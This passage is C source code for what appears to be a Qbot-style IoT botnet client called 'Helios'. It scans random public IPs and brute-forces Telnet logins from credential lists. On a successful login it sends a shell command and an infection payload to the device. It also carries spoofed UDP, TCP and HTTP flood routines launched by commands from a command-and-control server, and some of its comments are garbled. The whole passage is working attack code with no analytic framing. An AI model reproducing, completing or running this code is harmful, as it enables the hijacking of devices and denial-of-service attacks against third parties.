  1373. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
  1374. }
  1375. }
  1376. if(found) return 1;
  1377. return 0;
  1378. }
  1379. static uint8_t ipState[5] = {0};
  1380. in_addr_t GetRandomPublicIP()
  1381. {
  1382. static uint8_t ipState[4] = {0};
  1383. ipState[0] = rand() % 223;
  1384. ipState[1] = rand() % 255;
  1385. ipState[2] = rand() % 255;
  1386. ipState[3] = rand() % 255;
  1387. while(
  1388. (ipState[0] == 127) || // 127.0.0.0/8 - Loopback
  1389. (ipState[0] == 0) || // 185.7.78.16/8 - Invalid address space
  1390. (ipState[0] == 3) || // 3.0.0.0/8 - General Electric Company
  1391. (ipState[0] == 15 || ipState[0] == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
  1392. (ipState[0] == 56) || // 56.0.0.0/8 - US Postal Service
  1393. (ipState[0] == 10) || // 1185.7.78.16/8 - Internal network
  1394. (ipState[0] == 192 && ipState[1] == 168) || // 192.168.0.0/16 - Internal network
  1395. (ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || // 172.16.0.0/14 - Internal network
  1396. (ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || // 100.64.0.0/10 - IANA NAT reserved
  1397. (ipState[0] == 169 && ipState[1] > 254) || // 169.254.0.0/16 - IANA NAT reserved
  1398. (ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || // 198.18.0.0/15 - IANA Special use
  1399. (ipState[0] == 224) || // 224.*.*.*+ - Multicast
  1400. (ipState[0] == 6 || ipState[0] == 7 || ipState[0] == 11 || ipState[0] == 21 || ipState[0] == 22 || ipState[0] == 26 || ipState[0] == 28 || ipState[0] == 29 || ipState[0] == 30 || ipState[0] == 33 || ipState[0] == 55 || ipState[0] == 214 || ipState[0] == 215)
  1401. )
  1402. {
  1403. ipState[0] = rand() % 223;
  1404. ipState[1] = rand() % 255;
  1405. ipState[2] = rand() % 255;
  1406. ipState[3] = rand() % 255;
  1407. }
  1408. char ip[16] = {0};
  1409. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1410. return inet_addr(ip);
  1411. }
  1412. in_addr_t GetRandomIP(in_addr_t netmask) {
  1413. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
  1414. return tmp ^ ( rand_cmwc() & ~netmask);
  1415. }
  1416. unsigned short csum (unsigned short *buf, int count) {
  1417. register uint64_t sum = 0;
  1418. while( count > 1 ) { sum += *buf++; count -= 2; }
  1419. if(count > 0) { sum += *(unsigned char *)buf; }
  1420. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
  1421. return (uint16_t)(~sum);
  1422. }
  1423. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
  1424. struct tcp_pseudo {
  1425. unsigned long src_addr;
  1426. unsigned long dst_addr;
  1427. unsigned char zero;
  1428. unsigned char proto;
  1429. unsigned short length;
  1430. } pseudohead;
  1431. unsigned short total_len = iph->tot_len;
  1432. pseudohead.src_addr=iph->saddr;
  1433. pseudohead.dst_addr=iph->daddr;
  1434. pseudohead.zero=0;
  1435. pseudohead.proto=IPPROTO_TCP;
  1436. pseudohead.length=htons(sizeof(struct tcphdr));
  1437. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  1438. unsigned short *tcp = malloc(totaltcp_len);
  1439. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  1440. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  1441. unsigned short output = csum(tcp,totaltcp_len);
  1442. free(tcp);
  1443. return output;
  1444. }
  1445. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
  1446. iph->ihl = 5;
  1447. iph->version = 4;
  1448. iph->tos = 0;
  1449. iph->tot_len = sizeof(struct iphdr) + packetSize;
  1450. iph->id = rand_cmwc();
  1451. iph->frag_off = 0;
  1452. iph->ttl = MAXTTL;
  1453. iph->protocol = protocol;
  1454. iph->check = 0;
  1455. iph->saddr = source;
  1456. iph->daddr = dest;
  1457. }
  1458. int sclose(int fd) {
  1459. if(3 > fd) return 1;
  1460. close(fd);
  1461. return 0;
  1462. }
  1463. int socket_connect(char *host, in_port_t port) {
  1464. struct hostent *hp;
  1465. struct sockaddr_in addr;
  1466. int on = 1, sock;
  1467. if ((hp = gethostbyname(host)) == NULL) return 0;
  1468. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  1469. addr.sin_port = htons(port);
  1470. addr.sin_family = AF_INET;
  1471. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  1472. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  1473. if (sock == -1) return 0;
  1474. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
  1475. return 0;
  1476. return sock;
  1477. }
  1478. void StartTheLelz(int wait_usec, int maxfds) {
  1479. int i, res, num_tmps, j;
  1480. char buf[128], cur_dir;
  1481. int max = maxfds;
  1482. fd_set fdset;
  1483. struct timeval tv;
  1484. socklen_t lon;
  1485. int valopt;
  1486. srand(time(NULL) ^ rand_cmwc());
  1487. char line[256];
  1488. char* buffer;
  1489. struct sockaddr_in dest_addr;
  1490. dest_addr.sin_family = AF_INET;
  1491. dest_addr.sin_port = htons(23);
  1492. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1493. buffer = malloc(BUFFER_SIZE + 1);
  1494. memset(buffer, 0, BUFFER_SIZE + 1);
  1495. struct telstate_t fds[max];
  1496. memset(fds, 0, max * (sizeof(int) + 1));
  1497. for(i = 0; i < max; i++) {
  1498. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1499. fds[i].complete = 1;
  1500. fds[i].sockbuf = buffer;
  1501. }
  1502. for(num_tmps = 0; tmpdirs[++num_tmps] != 0; );
  1503. while(1) {
  1504. for(i = 0; i < max; i++) {
  1505. if(fds[i].totalTimeout == 0) {
  1506. fds[i].totalTimeout = time(NULL);
  1507. }
  1508. switch(fds[i].state) {
  1509. case 0:
  1510. {
  1511. if(fds[i].complete == 1)
  1512. {
  1513. // clear the current fd
  1514. char *tmp = fds[i].sockbuf;
  1515. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1516. fds[i].sockbuf = tmp;
  1517. // get a new random ip
  1518. fds[i].ip = GetRandomPublicIP();
  1519. }
  1520. else if(fds[i].complete == 0) {
  1521. fds[i].passwordInd++;
  1522. fds[i].usernameInd++;
  1523. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
  1524. fds[i].complete = 1;
  1525. continue;
  1526. }
  1527. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
  1528. fds[i].complete = 1;
  1529. continue;
  1530. }
  1531. }
  1532. dest_addr.sin_family = AF_INET;
  1533. dest_addr.sin_port = htons(23);
  1534. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1535. dest_addr.sin_addr.s_addr = fds[i].ip;
  1536. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1537. if(fds[i].fd == -1) continue;
  1538. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1539. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  1540. reset_telstate(&fds[i]);
  1541. } else {
  1542. advance_state(&fds[i], 1);
  1543. }
  1544. }
  1545. break;
  1546. case 1: {
  1547. FD_ZERO(&fdset);
  1548. FD_SET(fds[i].fd, &fdset);
  1549. tv.tv_sec = 0;
  1550. tv.tv_usec = wait_usec;
  1551. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1552. if(res == 1) {
  1553. lon = sizeof(int);
  1554. valopt = 0;
  1555. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1556. //printf("%d\n",valopt);
  1557. if(valopt) {
  1558. reset_telstate(&fds[i]);
  1559. } else {
  1560. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1561. advance_state(&fds[i], 2);
  1562. }
  1563. continue;
  1564. }
  1565. else if(res == -1) {
  1566. reset_telstate(&fds[i]);
  1567. continue;
  1568. }
  1569. if(fds[i].totalTimeout + 5 < time(NULL)) {
  1570. reset_telstate(&fds[i]);
  1571. }
  1572. }
  1573. break;
  1574. case 2: {
  1575. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
  1576. if(contains_fail(fds[i].sockbuf)) {
  1577. advance_state(&fds[i], 0);
  1578. } else {
  1579. advance_state(&fds[i], 3);
  1580. }
  1581. continue;
  1582. }
  1583. if(fds[i].totalTimeout + 7 < time(NULL)) {
  1584. reset_telstate(&fds[i]);
  1585. }
  1586. }
  1587. break;
  1588. case 3: {
  1589. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
  1590. reset_telstate(&fds[i]);
  1591. continue;
  1592. }
  1593. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  1594. reset_telstate(&fds[i]);
  1595. continue;
  1596. }
  1597. advance_state(&fds[i], 4);
  1598. }
  1599. break;
  1600. case 4: {
  1601. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
  1602. if(contains_fail(fds[i].sockbuf)) {
  1603. advance_state(&fds[i], 0);
  1604. } else {
  1605. advance_state(&fds[i], 5);
  1606. }
  1607. continue;
  1608. }
  1609. if(fds[i].totalTimeout + 3 < time(NULL)) {
  1610. reset_telstate(&fds[i]);
  1611. }
  1612. }
  1613. break;
  1614. case 5: {
  1615. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
  1616. reset_telstate(&fds[i]);
  1617. continue;
  1618. }
  1619. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  1620. reset_telstate(&fds[i]);
  1621. continue;
  1622. }
  1623. advance_state(&fds[i], 6);
  1624. }
  1625. break;
  1626. case 6: {
  1627. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) {
  1628. fds[i].totalTimeout = time(NULL);
  1629. if(contains_fail(fds[i].sockbuf)) {
  1630. advance_state(&fds[i], 0);
  1631. }
  1632. else if(contains_success(fds[i].sockbuf)) {
  1633. if(fds[i].complete == 2) {
  1634. advance_state(&fds[i], 7);
  1635. } else {
  1636. Heliosprintf(HeliosCommSock, "\x1b[1;33mLogin Found \x1b[1;31mAttempting To Brute \x1b[1;30mLIKE A GOD!!! IP:%s User:%s Pass:%s\x1b[0m", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1637. advance_state(&fds[i], 7);
  1638. }
  1639. } else {
  1640. reset_telstate(&fds[i]);
  1641. }
  1642. continue;
  1643. }
  1644. if(fds[i].totalTimeout + 7 < time(NULL)) {
  1645. reset_telstate(&fds[i]);
  1646. }
  1647. }
  1648. break;
  1649. case 7: {
  1650. fds[i].totalTimeout = time(NULL);
  1651. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) <0);
  1652. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  1653. if(send(fds[i].fd, infect, strlen(infect), MSG_NOSIGNAL) < 0) {
  1654. reset_telstate(&fds[i]);
  1655. continue;
  1656. }
  1657. if(fds[i].totalTimeout + 25 < time(NULL)) {
  1658. if(fds[i].complete !=3){
  1659. }
  1660. reset_telstate(&fds[i]);
  1661. }
  1662. break;
  1663. }
  1664. }
  1665. }
  1666. }
  1667. }
  1668. void sendSTD(unsigned char *ip, int port, int secs) {
  1669. int iSTD_Sock;
  1670. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  1671. time_t start = time(NULL);
  1672. struct sockaddr_in sin;
  1673. struct hostent *hp;
  1674. hp = gethostbyname(ip);
  1675. bzero((char*) &sin,sizeof(sin));
  1676. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  1677. sin.sin_family = hp->h_addrtype;
  1678. sin.sin_port = port;
  1679. unsigned int a = 0;
  1680. while(1){
  1681. char *randstrings[] = {"arfgG", "HBiug655", "KJYDFyljf754", "LIKUGilkut769458905", "JHFDSkgfc5747694", "GJjyur67458", "RYSDk747586", "HKJGi5r8675", "KHGK7985i", "yuituiILYF", "GKJDghfcjkgd4", "uygtfgtrevf", "tyeuhygbtfvg", "ewqdcftr", "trbazetghhnbrty", "tbhrwsehbg", "twehgbferhb", "etrbhhgetrb", "edfverthbyrtb", "kmiujmnhnhfgn", "zcdbvgdfsbgfd", "gdfbtsdgb", "ghdugffytsdyt", "tgerthgwtrwry", "yteytietyue", "qsortEQS", "8969876hjkghblk", "std", "dts", "lsk", "kek", "smack", "ily", "tyf", "pos", "cunts"};
  1682. char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
  1683. if (a >= 50) {
  1684. send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0);
  1685. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  1686. if (time(NULL) >= start + secs) {
  1687. close(iSTD_Sock);
  1688. _exit(0);
  1689. }
  1690. a = 0;
  1691. }
  1692. a++;
  1693. }
  1694. }
  1695.  
  1696. void sendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power)
  1697. {
  1698. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
  1699. char request[512], buffer[1];
  1700. for (i = 0; i < power; i++)
  1701. {
  1702. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, UserAgents[(rand() % 36)]);
  1703. if (fork())
  1704. {
  1705. while (end > time(NULL))
  1706. {
  1707. socket = socket_connect(host, port);
  1708. if (socket != 0)
  1709. {
  1710. write(socket, request, strlen(request));
  1711. read(socket, buffer, 1);
  1712. close(socket);
  1713. }
  1714. }
  1715. exit(0);
  1716. }
  1717. }
  1718. }
  1719.  
  1720. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval, int sleepcheck, int sleeptime) {
  1721. struct sockaddr_in dest_addr;
  1722. dest_addr.sin_family = AF_INET;
  1723. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1724. else dest_addr.sin_port = htons(port);
  1725. if(getHost(target, &dest_addr.sin_addr)) return;
  1726. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1727. register unsigned int pollRegister;
  1728. pollRegister = pollinterval;
  1729. if(spoofit == 32) {
  1730. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  1731. if(!sockfd) {
  1732. #ifdef PRINTS_ENABLED
  1733. Heliosprintf(HeliosCommSock, "Failed opening raw socket.");
  1734. #endif
  1735. return;
  1736. }
  1737. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
  1738. if(buf == NULL) return;
  1739. memset(buf, 0, packetsize + 1);
  1740. makeRandomStr(buf, packetsize);
  1741. int end = time(NULL) + timeEnd;
  1742. register unsigned int i = 0;
  1743. register unsigned int ii = 0;
  1744. while(1) {
  1745. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1746. if(i == pollRegister) {
  1747. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1748. if(time(NULL) > end) break;
  1749. i = 0;
  1750. continue;
  1751. }
  1752. i++;
  1753. if(ii == sleepcheck) {
  1754. usleep(sleeptime*1000);
  1755. ii = 0;
  1756. continue;
  1757. }
  1758. ii++;
  1759. }
  1760. } else {
  1761. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  1762. if(!sockfd) {
  1763. #ifdef PRINTS_ENABLED
  1764. Heliosprintf(HeliosCommSock, "Failed opening raw socket.");
  1765. #endif
  1766. return;
  1767. }
  1768. int tmp = 1;
  1769. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
  1770. #ifdef PRINTS_ENABLED
  1771. Heliosprintf(HeliosCommSock, "Failed setting raw headers mode.");
  1772. #endif
  1773. return;
  1774. }
  1775. int counter = 50;
  1776. while(counter--) {
  1777. srand(time(NULL) ^ rand_cmwc());
  1778. init_rand(rand());
  1779. }
  1780. in_addr_t netmask;
  1781. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  1782. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  1783. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  1784. struct iphdr *iph = (struct iphdr *)packet;
  1785. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  1786. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GetRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  1787. udph->len = htons(sizeof(struct udphdr) + packetsize);
  1788. udph->source = rand_cmwc();
  1789. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1790. udph->check = 0;
  1791. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  1792. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1793. int end = time(NULL) + timeEnd;
  1794. register unsigned int i = 0;
  1795. register unsigned int ii = 0;
  1796. while(1) {
  1797. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1798. udph->source = rand_cmwc();
  1799. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1800. iph->id = rand_cmwc();
  1801. iph->saddr = htonl( GetRandomIP(netmask) );
  1802. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1803. if(i == pollRegister) {
  1804. if(time(NULL) > end) break;
  1805. i = 0;
  1806. continue;
  1807. }
  1808. i++;
  1809. if(ii == sleepcheck) {
  1810. usleep(sleeptime*1000);
  1811. ii = 0;
  1812. continue;
  1813. }
  1814. ii++;
  1815. }
  1816. }
  1817. }
  1818. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval) {
  1819. register unsigned int pollRegister;
  1820. pollRegister = pollinterval;
  1821. struct sockaddr_in dest_addr;
  1822. dest_addr.sin_family = AF_INET;
  1823. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1824. else dest_addr.sin_port = htons(port);
  1825. if(getHost(target, &dest_addr.sin_addr)) return;
  1826. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1827. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  1828. if(!sockfd) {
  1829. #ifdef PRINTS_ENABLED
  1830. Heliosprintf(HeliosCommSock, "Failed opening raw socket.");
  1831. #endif
  1832. return;
  1833. }
  1834. int tmp = 1;
  1835. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
  1836. #ifdef PRINTS_ENABLED
  1837. Heliosprintf(HeliosCommSock, "Failed setting raw headers mode.");
  1838. #endif
  1839. return;
  1840. }
  1841. in_addr_t netmask;
  1842. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  1843. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  1844. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  1845. struct iphdr *iph = (struct iphdr *)packet;
  1846. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  1847. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GetRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  1848. tcph->source = rand_cmwc();
  1849. tcph->seq = rand_cmwc();
  1850. tcph->ack_seq = 0;
  1851. tcph->doff = 5;
  1852. if(!strcmp(flags, "all")) {
  1853. tcph->syn = 1;
  1854. tcph->rst = 1;
  1855. tcph->fin = 1;
  1856. tcph->ack = 1;
  1857. tcph->psh = 1;
  1858. } else {
  1859. unsigned char *pch = strtok(flags, ",");
  1860. while(pch) {
  1861. if(!strcmp(pch, "syn")) {
  1862. tcph->syn = 1;
  1863. } else if(!strcmp(pch, "rst")) {
  1864. tcph->rst = 1;
  1865. } else if(!strcmp(pch, "fin")) {
  1866. tcph->fin = 1;
  1867. } else if(!strcmp(pch, "ack")) {
  1868. tcph->ack = 1;
  1869. } else if(!strcmp(pch, "psh")) {
  1870. tcph->psh = 1;
  1871. } else {
  1872. #ifdef PRINTS_ENABLED
  1873. Heliosprintf(HeliosCommSock, "Invalid flag \"%s\"", pch);
  1874. #endif
  1875. }
  1876. pch = strtok(NULL, ",");
  1877. }
  1878. }
  1879. tcph->window = rand_cmwc();
  1880. tcph->check = 0;
  1881. tcph->urg_ptr = 0;
  1882. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1883. tcph->check = tcpcsum(iph, tcph);
  1884. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1885. int end = time(NULL) + timeEnd;
  1886. register unsigned int i = 0;
  1887. while(1) {
  1888. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1889. iph->saddr = htonl( GetRandomIP(netmask) );
  1890. iph->id = rand_cmwc();
  1891. tcph->seq = rand_cmwc();
  1892. tcph->source = rand_cmwc();
  1893. tcph->check = 0;
  1894. tcph->check = tcpcsum(iph, tcph);
  1895. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1896. if(i == pollRegister) {
  1897. if(time(NULL) > end) break;
  1898. i = 0;
  1899. continue;
  1900. }
  1901. i++;
  1902. }
  1903. }
  1904. void processCmd(int argc, unsigned char *argv[]) {
  1905. if(!strcmp(argv[0], "PING")) {
  1906. #ifdef PRINTS_ENABLED
  1907. Heliosprintf(HeliosCommSock, "PONG!");
  1908. #endif
  1909. return;
  1910. }
  1911. if(!strcmp(argv[0], "PUSSY")) {
  1912. if(!strcmp(argv[1], "OFF")) {
  1913. if(scanPid == 0) return;
  1914. kill(scanPid, 9);
  1915. #ifdef PRINTS_ENABLED
  1916. Heliosprintf(HeliosCommSock, "REP STOPPING!");
  1917. #endif
  1918. scanPid = 0;
  1919. }
  1920. if(!strcmp(argv[1], "ON")) {
  1921. if(scanPid != 0) return;
  1922. uint32_t parent;
  1923. parent = fork();
  1924. int threads = 1000;//if you change this it adds more threads to the scanner but will also fuck your bots.
  1925. int timeout = 10;
  1926. if (parent > 0) { scanPid = parent; return;}
  1927. else if(parent == -1) return;
  1928. StartTheLelz(timeout, threads);
  1929. _exit(0);
  1930. }
  1931. }
  1932. if (!strcmp(argv[0], "HTTP"))
  1933. {
  1934. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
  1935. if (listFork()) return;
  1936. Heliosprintf(HeliosCommSock, "HTTP %s Flooding %s:%d for %d seconds", argv[1], argv[2], atoi(argv[3]), atoi(argv[5]));
  1937. sendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
  1938. exit(0);
  1939. }
  1940. if(!strcmp(argv[0], "ANAL")) {
  1941. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65536 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1)) {
  1942. #ifdef PRINTS_ENABLED
  1943. Heliosprintf(HeliosCommSock, "UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>");
  1944. #endif
  1945. return;
  1946. }
  1947. unsigned char *ip = argv[1];
  1948. int port = atoi(argv[2]);
  1949. int time = atoi(argv[3]);
  1950. int spoofed = atoi(argv[4]);
  1951. int packetsize = atoi(argv[5]);
  1952. int pollinterval = (argc > 6 ? atoi(argv[6]) : 1000);
  1953. int sleepcheck = (argc > 7 ? atoi(argv[7]) : 1000000);
  1954. int sleeptime = (argc > 8 ? atoi(argv[8]) : 0);
  1955. if(strstr(ip, ",") != NULL) {
  1956. unsigned char *hi = strtok(ip, ",");
  1957. while(hi != NULL) {
  1958. if(!listFork()) {
  1959. sendUDP(hi, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
  1960. _exit(0);
  1961. }
  1962. hi = strtok(NULL, ",");
  1963. }
  1964. } else {
  1965. if (!listFork()){
  1966. sendUDP(ip, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
  1967. _exit(0);
  1968. }
  1969. }
  1970. return;
  1971. }
  1972. if(!strcmp(argv[0], "ORAL")) {
  1973. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1)) {
  1974. #ifdef PRINTS_ENABLED
  1975. Heliosprintf(HeliosCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
  1976. #endif
  1977. return;
  1978. }
  1979. unsigned char *ip = argv[1];
  1980. int port = atoi(argv[2]);
  1981. int time = atoi(argv[3]);
  1982. int spoofed = atoi(argv[4]);
  1983. unsigned char *flags = argv[5];
  1984. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
  1985. int psize = argc > 6 ? atoi(argv[6]) : 0;
  1986. if(strstr(ip, ",") != NULL) {
  1987. unsigned char *hi = strtok(ip, ",");
  1988. while(hi != NULL) {
  1989. if(!listFork()) {
  1990. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
  1991. _exit(0);
  1992. }
  1993. hi = strtok(NULL, ",");
  1994. }
  1995. } else {
  1996. if (!listFork()) {
  1997. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
  1998. _exit(0);
  1999. }
  2000. }
  2001. }
  2002. if(!strcmp(argv[0], "AIDS")) {
  2003. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1) {
  2004. #ifdef PRINTS_ENABLED
  2005. Heliosprintf(HeliosCommSock, "STD <target> <port> <time>");
  2006. #endif
  2007. return;
  2008. }
  2009. unsigned char *ip = argv[1];
  2010. int port = atoi(argv[2]);
  2011. int time = atoi(argv[3]);
  2012. if(strstr(ip, ",") != NULL) {
  2013. unsigned char *hi = strtok(ip, ",");
  2014. while(hi != NULL) {
  2015. if(!listFork()) {
  2016. sendSTD(hi, port, time);
  2017. _exit(0);
  2018. }
  2019. hi = strtok(NULL, ",");
  2020. }
  2021. } else {
  2022. if (listFork()) { return; }
  2023. sendSTD(ip, port, time);
  2024. _exit(0);
  2025. }
  2026. }
  2027. if(!strcmp(argv[0], "STP"))
  2028. {
  2029. int killed = 0;
  2030. unsigned long i;
  2031. for (i = 0; i < numpids; i++) {
  2032. if (pids[i] != 0 && pids[i] != getpid()) {
  2033. kill(pids[i], 9);
  2034. killed++;
  2035. }
  2036. }
  2037. }
  2038. }
  2039. int initConnection() {
  2040. unsigned char server[4096];
  2041. memset(server, 0, 4096);
  2042. if(HeliosCommSock) { close(HeliosCommSock); HeliosCommSock = 0; }
  2043. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
  2044. else currentServer++;
  2045. strcpy(server, HeliosServer[currentServer]);
  2046. int port = 666;
  2047. if(strchr(server, ':') != NULL) {
  2048. port = atoi(strchr(server, ':') + 1);
  2049. *((unsigned char *)(strchr(server, ':'))) = 0x0;
  2050. }
  2051. HeliosCommSock = socket(AF_INET, SOCK_STREAM, 0);
  2052. if(!connectTimeout(HeliosCommSock, server, port, 30)) return 1;
  2053. return 0;
  2054. }
  2055. int getOurIP() {
  2056. int sock = socket(AF_INET, SOCK_DGRAM, 0);
  2057. if(sock == -1) return 0;
  2058. struct sockaddr_in serv;
  2059. memset(&serv, 0, sizeof(serv));
  2060. serv.sin_family = AF_INET;
  2061. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
  2062. serv.sin_port = htons(53);
  2063. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
  2064. if(err == -1) return 0;
  2065. struct sockaddr_in name;
  2066. socklen_t namelen = sizeof(name);
  2067. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
  2068. if(err == -1) return 0;
  2069. ourIP.s_addr = name.sin_addr.s_addr;
  2070. int cmdline = open("/proc/net/route", O_RDONLY);
  2071. char linebuf[4096];
  2072. while(fdgets(linebuf, 4096, cmdline) != NULL) {
  2073. if(strstr(linebuf, "\t00000000\t") != NULL) {
  2074. unsigned char *pos = linebuf;
  2075. while(*pos != '\t') pos++;
  2076. *pos = 0;
  2077. break;
  2078. }
  2079. memset(linebuf, 0, 4096);
  2080. }
  2081. close(cmdline);
  2082. if(*linebuf) {
  2083. int i;
  2084. struct ifreq ifr;
  2085. strcpy(ifr.ifr_name, linebuf);
  2086. ioctl(sock, SIOCGIFHWADDR, &ifr);
  2087. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
  2088. }
  2089. close(sock);
  2090. }
  2091. char *getBuild() {
  2092. #if defined(__x86_64__) || defined(_M_X64)
  2093. return "x86_64";
  2094. #elif defined(__i386) || defined(_M_IX86)
  2095. return "x86_32";
